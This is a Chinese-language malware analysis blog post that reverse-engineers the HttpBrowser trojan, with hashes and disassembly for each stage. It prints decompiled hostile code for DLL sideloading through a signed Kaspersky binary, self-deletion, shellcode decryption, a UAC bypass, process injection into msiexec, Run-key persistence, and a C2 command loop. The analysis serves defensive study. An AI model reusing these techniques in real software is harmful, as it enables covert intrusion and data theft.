利用kaspersky白文件的恶意样本分析
b2ahex
8月 08, 2014
之前分析过的样本,随便贴点东西上来吧…
by @b2ahex
一、样本信息
样本名称:280836636_37EEC1A29D316ED1E5E766B599DC32A1.bin
样本大小: 64,599 字节
文件类型:EXE文件
病毒名称:HttpBrowser
样本MD5: 37eec1a29d316ed1e5e766b599dc32a1
样本SHA256:a89c21dd608c51c4bf0323d640f816e464578510389f9edcf04cd34090decc91
二、行为分析
280836636_37EEC1A29D316ED1E5E766B599DC32A1.bin 样本的主要行为分为释放3个文件,启动其中释放的样本EXE,提高优先级调用外部程序自删除,详细如下:
1.获取TEMP路径,设置当前目录
push 0x0
push eax
mov byte ptr ss:[ebp-0x114],0x0
call <jmp.&msvcrt.memset>
add esp,0x48
lea eax,[local.69]
push eax ; /Buffer = 0017FD64
push 0x104 ; |BufSize = 104 (260.)
call dword ptr ds:[<&KERNEL32.GetTempPathA>]
lea eax,[local.69]
push eax ; /Path = "C:\Users\admin\AppData\Local\Temp\"
call dword ptr ds:[<&KERNEL32.SetCurrentDirect>
2.连续3次使用zlib解码内存中的数据,释放到temp目录,并修改释放文件的时间属性
在 temp 目录释放解码之后的文件 并修改文件时间
00F44310 |. 50 push eax
00F44311 |. FFB5 D4FEFFFF push [local.75]; |Attributes = ARCHIVE|NORMAL
00F44317 |. 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00F44319 |. 50 push eax ; |pSecurity = NULL
00F4431A |. 50 push eax ; |ShareMode = 0
00F4431B |. 68 00000040 push 0x40000000; |Access = GENERIC_WRITE
00F44320 |. 53 push ebx ; |msi.dll
00F44321 |. FF15 2C50F400 call dword ptr ds:[<&KERNEL32.CreateFileA>]
00F44327 |. 8BF0 mov esi,eax
00F44329 |. 83FE FF cmp esi,-0x1
00F4432C |. 75 0A jnz short 28083663.00F44338
00F4432E |. B8 00020000 mov eax,0x200
00F44333 |. E9 90000000 jmp 28083663.00F443C8
00F44338 |> 8B1F mov ebx,dword ptr ds:[edi]
00F4433A |. E8 F8F6FFFF call 28083663.00F43A37
00F4433F |. C645 0B 00 mov byte ptr ss:[ebp+0xB],0x0
00F44343 |. BB 00400000 mov ebx,0x4000
00F44348 |. EB 1B jmp short 28083663.00F44365
00F4434A |> 74 32 / je short 28083663.00F4437E
00F4434C |. 6A 00 | push 0x0 ; /pOverlapped = NULL
00F4434E |. 8D4D FC | lea ecx,[local.1] ; |
00F44351 |. 51| push ecx ; |pBytesWritten = NULL
00F44352 |. 50| push eax ; |nBytesToWrite = 0x0
00F44353 |. 8D85 CCBDFFFF | lea eax,[local.4237] ; |
00F44359 |. 50| push eax ; |Buffer = NULL
00F4435A |. 56| push esi ; |hFile = 005512B8
00F4435B |. FF15 3850F400 | call dword ptr ds:[<&KERNEL32.WriteFile>]
修改文件时间 -> 2014年4月X日
009E4390 |. 8D85 E8FEFFFF lea eax,[local.70]
009E4396 |. 50 push eax ; /pLastWrite = 0031F104
009E4397 |. 8D85 D8FEFFFF lea eax,[local.74] ; |
009E439D |. 50 push eax ; |pLastAccess = 0031F104
009E439E |. 8D85 E0FEFFFF lea eax,[local.72] ; |
009E43A4 |. 50 push eax ; |pCreationTime = 0031F104
009E43A5 |. 56 push esi ; |hFile = 0000000C
009E43A6 |. FF15 34509E00 call dword ptr ds:[<&KERNEL32.SetFileTime>] ; \SetFileTime
009E43AC |> 56 push esi ; /hObject = 0000000C
009E43AD |. FF15 4C509E00 call dword ptr ds:[<&KERNEL32.CloseHandle>] ; \CloseHandle
样本一共释放了3个文件,其中Setup.exe 是Kaspersky的文件,这里用于dll劫持,白加黑
文件信息如下:
Filepath: %TEMP%\msi.dll
Size: 4.5KiB (4608 bytes)
Type: PE32 (DLL)
MD5:cab40c98344ab44d2701b7b9c2efcbfa
SHA1:69d899d6e737551f6dadc79286b3fec9d731e0fb
SHA256:0101ad43ba1a3b7daf650942c31a92347a54d07eac2a8c6b2f7ae0af42046540
=======================================================================
Filepath:%TEMP%\msi.dll.url
Size:18KiB (18510 bytes)
Type:datafile(Shellcode + Dll)
MD5:3b1f4b2856bd8055c2a0d9a8e895d44e
SHA1:0e57e7cd58a817e140068da60721a57e9ffebf17
SHA256:5d0fa65d7f86f310b71561ec6a62961226077daefe73f108dc305e3764e40231
========================================================================
Filepath:%TEMP%\setup.exe
Size:34KiB (34424 bytes)
Type:PE32 EXE
MD5:d00b3169f45e74bb22a1cd684341b14a
SHA1:2d8e43f9f8ef6cdf0cafb170a65cb27d37fb166d
SHA256:83f40e70ea3ba0e614d08f1070dafe75092660003b8a1f8b563d4f5b012f
3.启动刚释放的Setup.exe
009E122E |. 57 push edi
009E122F |. 8D85 E9FDFFFF lea eax,dword ptr ss:[ebp-0x217] ; |
009E1235 |. 53 push ebx ; |c = 00
009E1236 |. 50 push eax ; |s = 0031F680
009E1237 |. 889D E8FDFFFF mov byte ptr ss:[ebp-0x218],bl ; |
009E123D |. E8 BA340000 call <jmp.&msvcrt.memset ; \memset
009E1242 |. 83C4 10 add esp,0x10
009E1245 |. 8D85 ECFEFFFF lea eax,[local.69]
009E124B |. 50 push eax ; / "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E124C |. 8D85 E8FDFFFF lea eax,[local.134]
009E1252 |. 50 push eax
009E1253 |. FF15 24509E00 call dword ptr ds:[<&KERNEL32.lstrcpyA>] ; \lstrcpyA
009E1259 |. 68 14519E00 push 28083663.009E5114 ; /StringToAdd = "\setup.exe"
009E125E |. 8D85 E8FDFFFF lea eax,[local.134]; |
009E1264 |. 50 push eax ; |ConcatString = "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E1265 |. FF15 10509E00 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; \lstrcatA
009E126B |. 8B35 58509E00 mov esi,dword ptr ds:[<&SHELL32.ShellExecuteA>>; shell32.ShellExecuteA
009E1271 |. 6A 05 push 0x5 ; /IsShown = 0x5
009E1273 |. 8D85 ECFEFFFF lea eax,[local.69] ; |
009E1279 |. 50 push eax ; |DefDir = "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E127A |. 53 push ebx ; |Parameters = NULL
009E127B |. 8D85 E8FDFFFF lea eax,[local.134]; |
009E1281 |. 50 push eax ; |FileName = "C:\Users\admin\AppData\Local\Temp\\setup.exe"
009E1282 |. BF 20519E00 mov edi,28083663.009E5120
009E1287 |. 57 push edi ; |Operation = "open"
009E1288 |. 53 push ebx ; |hWnd = NULL
009E1289 |. FFD6 call esi ; \ShellExecuteA
4.提高自身优先级,自身进程退出后,通过外部命令实现程序自删除
009E12AD |. 59 pop ecx
009E12AE |. 59 pop ecx
009E12AF |. 68 00010000 push 0x100 ; /Priority = REALTIME_PRIORITY_CLASS
009E12B4 |. 8818 mov byte ptr ds:[eax],bl ; |
009E12B6 |. FF15 04509E00 call dword ptr ds:[<&KERNEL32.GetCurrentProces>; |[GetCurrentProcess
009E12BC |. 50 push eax ; |hProcess = 0031F23C
009E12BD |. FF15 00509E00 call dword ptr ds:[<&KERNEL32.SetPriorityClass>; \SetPriorityClass
009E12C3 |. 6A 0F push 0xF ; /Priority = THREAD_PRIORITY_TIME_CRITICAL
009E12C5 |. FF15 08509E00 call dword ptr ds:[<&KERNEL32.GetCurrentThread>; |[GetCurrentThread
009E12CB |. 50 push eax ; |hThread = 0031F23C
009E12CC |. FF15 14509E00 call dword ptr ds:[<&KERNEL32.SetThreadPriorit>; \SetThreadPriority
009E12D2 |. FF15 0C509E00 call dword ptr ds:[<&KERNEL32.GetCommandLineA>>; [GetCommandLineA
009E12D8 |. 50 push eax ; /<%s> = "/c del /q "C:\Users\admin\Desktop\280836636_37EEC1A29D316ED1E5E766B599DC32A1.bin""
009E12D9 |. 8D85 A4F9FFFF lea eax,[local.407] ; |
009E12DF |. 68 28519E00 push 28083663.009E5128 ; |Format = "/c del /q %s"
009E12E4 |. 50 push eax ; |s = 0031F23C
009E12E5 |. FF15 60509E00 call dword ptr ds:[<&USER32.wsprintfA>] ; \wsprintfA
009E12EB |. 83C4 0C add esp,0xC
009E12EE |. 53 push ebx
009E12EF |. 8D85 B4FAFFFF lea eax,[local.339]
009E12F5 |. 50 push eax
009E12F6 |. 8D85 A4F9FFFF lea eax,[local.407]
009E12FC |. 50 push eax
009E12FD |. 68 38519E00 push 28083663.009E5138 ; ASCII 63,"cmd.exe"
009E1302 |. 57 push edi ; 28083663.009E5120
009E1303 |. 53 push ebx
009E1304 |. FFD6 call esi ; shell32.ShellExecuteA
Setup.exe 样本的主要行为是加载起刚刚释放的msi.dll,是Kaspersky的EXE,这里用于加载恶意dll
(ps:这个EXE带有Kaspersky Lab的数字签名证书)
加载释放的dll文件
0040146F |. 68 8C414000 push setup.0040418C ; /FileName = "msi.dll"
00401474 |. FF15 2C404000 call dword ptr ds:[<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
msi.dll 样本的主要功能为将 msi.dll.url 文件 读入内存,并执行其shellcode
读取msi.dll.url文件到内存
1000034C 68 A40A0010 push msi.10000AA4 ; ASCII ".url"
10000351 8D95 E8FEFFFF lea edx,dword ptr ss:[ebp-0x118]
10000357 52 push edx
10000358 FF15 100A0010 call dword ptr ds:[<&KERNEL32.lstrcatA>] ; kernel32.lstrcatA
1000035E 6A 00 push 0x0
10000360 6A 00 push 0x0
10000362 6A 03 push 0x3
10000364 6A 00 push 0x0
10000366 6A 01 push 0x1
10000368 68 00000080 push 0x80000000
1000036D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-0x118]
10000373 50 push eax
10000374 FF15 000A0010 call dword ptr ds:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
1000037A 8985 E0FEFFFF mov dword ptr ss:[ebp-0x120],eax
10000380 83BD E0FEFFFF FF cmp dword ptr ss:[ebp-0x120],-0x1
10000387 0F84 86000000 je msi.10000413
1000038D 6A 00 push 0x0
1000038F 8B8D E0FEFFFF mov ecx,dword ptr ss:[ebp-0x120]
10000395 51 push ecx
10000396 FF15 040A0010 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; kernel32.GetFileSize
1000039C 8945 F8 mov dword ptr ss:[ebp-0x8],eax
1000039F 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
100003A3 76 61 jbe short msi.10000406
100003A5 6A 40 push 0x40
100003A7 68 00100000 push 0x1000
100003AC 8B55 F8 mov edx,dword ptr ss:[ebp-0x8]
100003AF 83C2 01 add edx,0x1
100003B2 52 push edx
100003B3 6A 00 push 0x0
100003B5 FF15 140A0010 call dword ptr ds:[<&KERNEL32.VirtualAlloc>] ; kernel32.VirtualAlloc
100003BB 8945 FC mov dword ptr ss:[ebp-0x4],eax
100003BE 837D FC 00 cmp dword ptr ss:[ebp-0x4],0x0
100003C2 74 42 je short msi.10000406
100003C4 6A 00 push 0x0
100003C6 6A 00 push 0x0
100003C8 6A 00 push 0x0
100003CA 8B85 E0FEFFFF mov eax,dword ptr ss:[ebp-0x120]
100003D0 50 push eax
100003D1 FF15 080A0010 call dword ptr ds:[<&KERNEL32.SetFilePointer>]; kernel32.SetFilePointer
100003D7 6A 00 push 0x0
100003D9 8D8D E4FEFFFF lea ecx,dword ptr ss:[ebp-0x11C]
100003DF 51 push ecx
100003E0 8B55 F8 mov edx,dword ptr ss:[ebp-0x8]
100003E3 52 push edx
100003E4 8B45 FC mov eax,dword ptr ss:[ebp-0x4]
100003E7 50 push eax
100003E8 8B8D E0FEFFFF mov ecx,dword ptr ss:[ebp-0x120]
100003EE 51 push ecx
100003EF FF15 0C0A0010 call dword ptr ds:[<&KERNEL32.ReadFile>] ; kernel32.ReadFile
msi.dll.url 文件的主要功能为执行shellcode,从自身数据段解码出一个dll可执行文件,修复其导入表,然后在内存中执行,该解码出来的dll为木马的主体,shllcode分析如下:
1.跳转到msi.dll.url,执行Shellcode,进行代码SMC动态自解密,获得下面的shellcode
00340015 317B 16 xor dword ptr ds:[ebx+0x16],edi
00340018 037B 16 add edi,dword ptr ds:[ebx+0x16]
0034001B ^ E2 F5 loopd short 00340012
0034001D E8 FB090000 call 00340A1D
00340022 C3 retn
00340023 CC int3
00340024 CC int3
00340025 CC int3
00340026 CC int3
00340027 CC int3
00340028 CC int3
00340029 CC int3
0034002A CC int3
0034002B CC int3
0034002C CC int3
0034002D 55 push ebp
2.计算哈希在ntdll找到指定api
003400C8 55 push ebp
003400C9 8BEC mov ebp,esp
003400CB 51 push ecx ; ntdll.76FA5618
003400CC 53 push ebx ; ntdll.76FAA312
003400CD 52 push edx ; ntdll.76FA9310
003400CE 33C9 xor ecx,ecx ; ntdll.76FA5618
003400D0 33DB xor ebx,ebx ; ntdll.76FAA312
003400D2 33D2 xor edx,edx ; ntdll.76FA9310
003400D4 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
003400D7 8A10 mov dl,byte ptr ds:[eax]
003400D9 80CA 60 or dl,0x60
003400DC 03DA add ebx,edx ; ntdll.76FA9310
003400DE D1E3 shl ebx,1
003400E0 0345 10 add eax,dword ptr ss:[ebp+0x10]
003400E3 8A08 mov cl,byte ptr ds:[eax]
003400E5 84C9 test cl,cl
003400E7 ^ E0 EE loopdne short 003400D7
003400E9 33C0 xor eax,eax
003400EB 8B4D 0C mov ecx,dword ptr ss:[ebp+0xC]
003400EE 3BD9 cmp ebx,ecx ; ntdll.76FA5618
003400F0 74 01 je short 003400F3
003400F2 40 inc eax
003400F3 5A pop edx
获取以下API地址:
memcpy
memset
RtlAllocateHeap
RtlReAllocateHeap
LoadLibraryA
GetProcAddress
VirtualAlloc
VirtualProtect
VirtualFree
IsBadReadPtr
GetProcessHeap
RtlDecompressBuffer
003408DD 55 push ebp
003408DE 8BEC mov ebp,esp
003408E0 68 7A340000 push 0x347A
003408E5 68 08B70100 push 0x1B708
003408EA E8 3EF7FFFF call <Getfuncaddr> ; memcpy
003408EF 83C4 08 add esp,0x8
003408F2 8B4D 08 mov ecx,dword ptr ss:[ebp+0x8]
003408F5 8941 0C mov dword ptr ds:[ecx+0xC],eax
003408F8 68 C4340000 push 0x34C4
003408FD 68 08B70100 push 0x1B708
00340902 E8 26F7FFFF call <Getfuncaddr> ; memset
00340907 83C4 08 add esp,0x8
0034090A 8B55 08 mov edx,dword ptr ss:[ebp+0x8]
0034090D 8942 10 mov dword ptr ds:[edx+0x10],eax
00340910 68 2C477000 push 0x70472C
00340915 68 08B70100 push 0x1B708
0034091A E8 0EF7FFFF call <Getfuncaddr> ; RtlAllocateHeap
.....
3.调用RtlDecompressBuffer解压出一个pe文件(dll) 核心木马
00340867 6A 00 push 0x0
00340869 8B55 08 mov edx,dword ptr ss:[ebp+0x8]
0034086C 8B42 24 mov eax,dword ptr ds:[edx+0x24]
0034086F FFD0 call eax ; VirtualAlloc
00340871 8945 FC mov dword ptr ss:[ebp-0x4],eax
00340874 837D FC 00 cmp dword ptr ss:[ebp-0x4],0x0
00340878 74 38 je short 003408B2
0034087A 8B4D 18 mov ecx,dword ptr ss:[ebp+0x18]
0034087D 51 push ecx
0034087E 8B55 14 mov edx,dword ptr ss:[ebp+0x14]
00340881 52 push edx
00340882 8B45 10 mov eax,dword ptr ss:[ebp+0x10]
00340885 8B08 mov ecx,dword ptr ds:[eax]
00340887 51 push ecx
00340888 8B55 18 mov edx,dword ptr ss:[ebp+0x18]
0034088B 8B02 mov eax,dword ptr ds:[edx]
0034088D 50 push eax
0034088E 8B4D FC mov ecx,dword ptr ss:[ebp-0x4]
00340891 51 push ecx
00340892 0FB755 0C movzx edx,word ptr ss:[ebp+0xC]
00340896 52 push edx
00340897 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
0034089A 8B48 30 mov ecx,dword ptr ds:[eax+0x30]
0034089D FFD1 call ecx ; RtlDecompressBuffer
4.动态加载WININET,ws2_32,kernel32,user32,ADVAPI32.dll,shell32,ole32,msvcr模块,并获取所需API地址,修复内存DLL导入地址表,并最终调转到核心木马dll
00340536 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00340539 8B4D F4 mov ecx,dword ptr ss:[ebp-0xC]
0034053C 0348 0C add ecx,dword ptr ds:[eax+0xC]
0034053F 51 push ecx
00340540 8B55 08 mov edx,dword ptr ss:[ebp+0x8]
00340543 8B02 mov eax,dword ptr ds:[edx]
00340545 FFD0 call eax ; LoadLibraryA
00340547 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0034054A 837D E4 FF cmp dword ptr ss:[ebp-0x1C],-0x1
0034054E 75 0C jnz short 0034055C
00340550 C745 F8 00000000 mov dword ptr ss:[ebp-0x8],0x0
00340557 E9 20010000 jmp 0034067C
0034055C 8B4D 0C mov ecx,dword ptr ss:[ebp+0xC]
0034055F 8B51 0C mov edx,dword ptr ds:[ecx+0xC]
00340562 8D0495 04000000 lea eax,dword ptr ds:[edx*4+0x4]
00340639 8B55 E8 mov edx,dword ptr ss:[ebp-0x18]
0034063C 8B45 F4 mov eax,dword ptr ss:[ebp-0xC]
0034063F 0302 add eax,dword ptr ds:[edx]
00340641 8945 E0 mov dword ptr ss:[ebp-0x20],eax
00340644 8B4D E0 mov ecx,dword ptr ss:[ebp-0x20]
00340647 83C1 02 add ecx,0x2
0034064A 51 push ecx
0034064B 8B55 E4 mov edx,dword ptr ss:[ebp-0x1C]
0034064E 52 push edx
0034064F 8B45 08 mov eax,dword ptr ss:[ebp+0x8]
00340652 8B48 04 mov ecx,dword ptr ds:[eax+0x4]
00340655 FFD1 call ecx ; GetFuncAddress
00340657 8B55 EC mov edx,dword ptr ss:[ebp-0x14]
0034065A 8902 mov dword ptr ds:[edx],eax
0034065C 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
0034065F 8338 00 cmp dword ptr ds:[eax],0x0
00340662 75 09 jnz short 0034066D
00340664 C745 F8 00000000 mov dword ptr ss:[ebp-0x8],0x0
0034066B EB 02 jmp short 0034066F
0034066D ^ EB 85 jmp short 003405F4
0034066F 837D F8 00 cmp dword ptr ss:[ebp-0x8],0x0
木马核心DLL分析:
1.
核心dll在初次运行时会将temp目录下释放的3个文件移动到C:\ProgramData\kav\目录,并将setup.exe重命名为svchost.exe
GetModuleFileNameW(v0, v16, v17);
if ( lstrcmpW(&Filename, &String1) )
{
GetTempPathW(0x104u, &Buffer);
GetTempFileNameW(&PathName, &PrefixString, 0x10u, &PathName);
SetFileAttributesW(&String1, 0x80u);
MoveFileExW(&String1, &PathName, 1u);
MoveFileExW(&PathName, 0, 4u);
MoveFileExW(&Filename, &String1, 3u);
lstrcpyW(&NewFileName, &String2);
lstrcatW(&NewFileName, &word_364808);
MoveFileW(&ExistingFileName, &NewFileName);
lstrcpyW(&v4, &String2);
lstrcatW(&v4, &word_3646D4);
MoveFileW(&word_36482C, &v4);
}
2.
利用migwiz白名单程序绕过UAC
Parameters = 0;
((void (__cdecl *)(char *, _DWORD, _DWORD))dword_363AD8)(&v13, 0, 518);
wsprintfW(&Parameters, &word_364624, v11, v2);
Buffer = 0;
((void (__cdecl *)(char *, _DWORD, _DWORD))dword_363AD8)(&v15, 0, 518);
GetSystemDirectoryW(&Buffer, 0x103u);
lstrcatW(&Buffer, L"\\migwiz\\migwiz.exe");
if ( sub_3631AF() )
{
v3 = GetModuleHandleW(&ModuleName);
v10 = GetProcAddress(v3, ProcName);
v4 = GetModuleHandleW(&ModuleName);
v5 = GetProcAddress(v4, byte_364664);
v6 = v5;
v11 = 0;
if ( v10 && v5 )
{
if ( ((int (__stdcall *)(int *))v10)(&v11) )
{
ShellExecuteW(0, &Operation, &Buffer, &Parameters, &String2, 5);
((void (__stdcall *)(int))v6)(v11);
}
}
}
else
3.
创建msiexec傀儡进程,远程写入从.url文件中提取的shellcode,并创建远程线程执行,注意上线地址和端口已经通过CreateProcess的参数传递给傀儡进程
0012E9D0 0012EC68 |ModuleFileName = "C:\Windows\system32\msiexec.exe"
0012E9D4 0012EA60 |CommandLine = " 103.xx.x.x4 443 1"
0012E9D8 00000000 |pProcessSecurity = NULL
0012E9DC 00000000 |pThreadSecurity = NULL
0012E9E0 00000001 |InheritHandles = TRUE
0012E9E4 00000004 |CreationFlags = CREATE_SUSPENDED
0012E9E8 00000000 |pEnvironment = NULL
0012E9EC 00000000 |CurrentDir = NULL
0012E9F0 0012EA04 |pStartupInfo = 0012EA04
0012E9F4 0012EA48 \pProcessInfo = 0012EA48
0012E9F8 00364714 ASCII "443"
00362878 FF15 D4403600 call dword ptr ds:[0x3640D4] ; kernel32.VirtualAlloc
0036287E 8985 E0F9FFFF mov dword ptr ss:[ebp-0x620],eax
00362884 3BC6 cmp eax,esi
00362886 74 28 je short 003628B0
00362888 56 push esi
00362889 56 push esi
0036288A 56 push esi
0036288B 53 push ebx
0036288C FF15 64403600 call dword ptr ds:[0x364064] ; kernel32.SetFilePointer
00362892 56 push esi
00362893 8D85 DCF9FFFF lea eax,dword ptr ss:[ebp-0x624]
00362899 50 push eax
0036289A 57 push edi
0036289B FFB5 E0F9FFFF push dword ptr ss:[ebp-0x620]
003628A1 53 push ebx
003628A2 FF15 D0403600 call dword ptr ds:[0x3640D0] ; kernel32.ReadFile
003628A8 39BD DCF9FFFF cmp dword ptr ss:[ebp-0x624],edi
003628AE ^ 75 A7 jnz short 00362857
003628B0 53 push ebx
003628B1 FF15 7C403600 call dword ptr ds:[0x36407C] ; kernel32.CloseHandle
003628B7 8D85 CCF9FFFF lea eax,dword ptr ss:[ebp-0x634]
003628BD 50 push eax
003628BE 8D85 88F9FFFF lea eax,dword ptr ss:[ebp-0x678]
003628C4 50 push eax
003628C5 56 push esi
003628C6 56 push esi
003628C7 6A 04 push 0x4
003628C9 6A 01 push 0x1
003628CB 56 push esi
003628CC 56 push esi
003628CD 8D85 E4F9FFFF lea eax,dword ptr ss:[ebp-0x61C]
003628D3 50 push eax
003628D4 8D85 ECFBFFFF lea eax,dword ptr ss:[ebp-0x414]
003628DA 50 push eax
003628DB FF15 84403600 call dword ptr ds:[0x364084] ; kernel32.CreateProcessW
003628E1 85C0 test eax,eax
003628E3 ^ 0F84 6EFFFFFF je 00362857
003628E9 6A 40 push 0x40
003628EB 68 00300000 push 0x3000
003628F0 8D47 01 lea eax,dword ptr ds:[edi+0x1]
003628F3 50 push eax
003628F4 56 push esi
003628F5 FFB5 CCF9FFFF push dword ptr ss:[ebp-0x634]
003628FB FF15 B0403600 call dword ptr ds:[0x3640B0] ; kernel32.VirtualAllocEx
00362901 8BD8 mov ebx,eax
00362903 3BDE cmp ebx,esi
00362905 ^ 0F84 4CFFFFFF je 00362857
0036290B 56 push esi
0036290C 57 push edi
0036290D FFB5 E0F9FFFF push dword ptr ss:[ebp-0x620]
00362913 53 push ebx
00362914 FFB5 CCF9FFFF push dword ptr ss:[ebp-0x634]
0036291A FF15 C0403600 call dword ptr ds:[0x3640C0] ; kernel32.WriteProcessMemory
00362920 85C0 test eax,eax
00362922 ^ 0F84 2FFFFFFF je 00362857
00362928 56 push esi
00362929 56 push esi
0036292A 56 push esi
0036292B 53 push ebx
0036292C 56 push esi
0036292D 56 push esi
0036292E FFB5 CCF9FFFF push dword ptr ss:[ebp-0x634]
00362934 FF15 94403600 call dword ptr ds:[0x364094] ; kernel32.CreateRemoteThread
4.
msiexec 中的 shellcode 再次在内存解密执行木马核心dll,由于此时的参数发生变化,已经存在上线的ip和端口,代码流程发生变化,通过设置注册的HKCU\Software\Microsoft\Windows\CurrentVersion\Run\kav 位置设置自启动的程序 “C:\ProgramData\kav\svchost.exe”
if ( pNumArgs == 4 )
{
InitAndSetAuto();
v5 = wtoi(v4[3]);
v6 = wtoi(v4[2]);
NetWork(v4[1], v6, v5);
}
if ( pNumArgs == 1 )
{
MoveAndPassUac();
v7 = atoi(Str);
if ( !CreatePuppet(v7) )
{
v8 = atoi(Str);
NetWork(&szServerName, v8, 1);
}
ExitProcess(0);
}
设置svchost.exe(原setup.exe)自启动
((void (__cdecl *)(char *, _DWORD, signed int))dword_363AD8)(&v5, 0, 518);
wsprintfW(&String, &word_36478C, a1);
result = RegCreateKeyExW(HKEY_CURRENT_USER, &SubKey, 0, 0, 0, 0xF003Fu, 0, &phkResult, 0);
if ( !result )
{
v2 = lstrlenW(&String);
RegSetValueExW(phkResult, &ValueName, 0, 1u, (const BYTE *)&String, 2 * v2);
result = RegCloseKey(phkResult);
}
5.
木马通过http协议与远程服务器进行通信
IP:103.xx.x.x4
Port:443
.text:003618A7 pushebx ; dwFlags
.text:003618A8 pushebx ; lpszProxyBypass
.text:003618A9 pushebx ; lpszProxy
.text:003618AA pushebx ; dwAccessType
.text:003618AB pushoffset szAgent ; "HttpBrowser/1.0"
.text:003618B0 mov [esp+434h+var_410], ebx
.text:003618B4 callds:InternetOpenW
.text:003618BA cmp eax, ebx
.text:003618BC jz loc_361A28
.text:003618C2 pushebx ; dwContext
.text:003618C3 pushebx ; dwFlags
.text:003618C4 push3 ; dwService
.text:003618C6 pushebx ; lpszPassword
.text:003618C7 pushebx ; lpszUserName
.text:003618C8 pushdword ptr [ebp+nServerPort] ; nServerPort
.text:003618CB pushesi ; lpszServerName
.text:003618CC pusheax ; hInternet
.text:003618CD callds:InternetConnectW
经分析,木马包含上传,下载等主要功能
while ( 1 )
{
if ( SendGetPack(v5, a3, &MultiByteStr) )
{
v6 = sub_363570(&MultiByteStr);
if ( sub_36318C(L"init", v6) )
{
v7 = 0;
a3 = 1;
sub_362BC4();
sub_3629E3(v5);
sub_361000(v5);
}
else if ( sub_36318C(L"write", v6) )
{
v7 = 0;
a3 = 1;
sub_362C65(v6 + 6);
}
else if ( sub_36318C(L"list", v6) )
{
v7 = 0;
a3 = 1;
GetFileList(v5, 0);
}
else if ( sub_36318C(L"upload", v6) )
{
v7 = 0;
a3 = 1;
uploadfunc(v6 + 7);
GetFileList(v8, 1);
v5 = v8;
}
else if ( sub_36318C(L"down", v6) )
{
v7 = 0;
a3 = 1;
downfunc((int)v5, v6 + 5);
}
else if ( v7 >= 10 || (++v7, v7 >= 10) )
{
a3 = 10;
}
operator delete(v6);
}
Sleep(1000 * a3);
}
三、样本分析总结
样本的工作流程如下:
- 280836636原始样本 在临时目录释放 3个文件,并启动其中带有 Kaspersky Lab 数字签名的 setup.exe,之后自删除
- setup.exe 被执行后加载释放的 msi.dll,白加黑
- msi.dll 解析并加载释放的 msi.dll.url 文件,这个文件包含一段 shellcode及木马的核心dll
- msi.dll.url 解密自身代码,在内存中释放并执行木马的核心dll
- 木马核心dll 根据自身参数移动temp目录下的三个文件到指定目录,包含uac绕过,创建傀儡载体,设置自启动及正常上线通信功能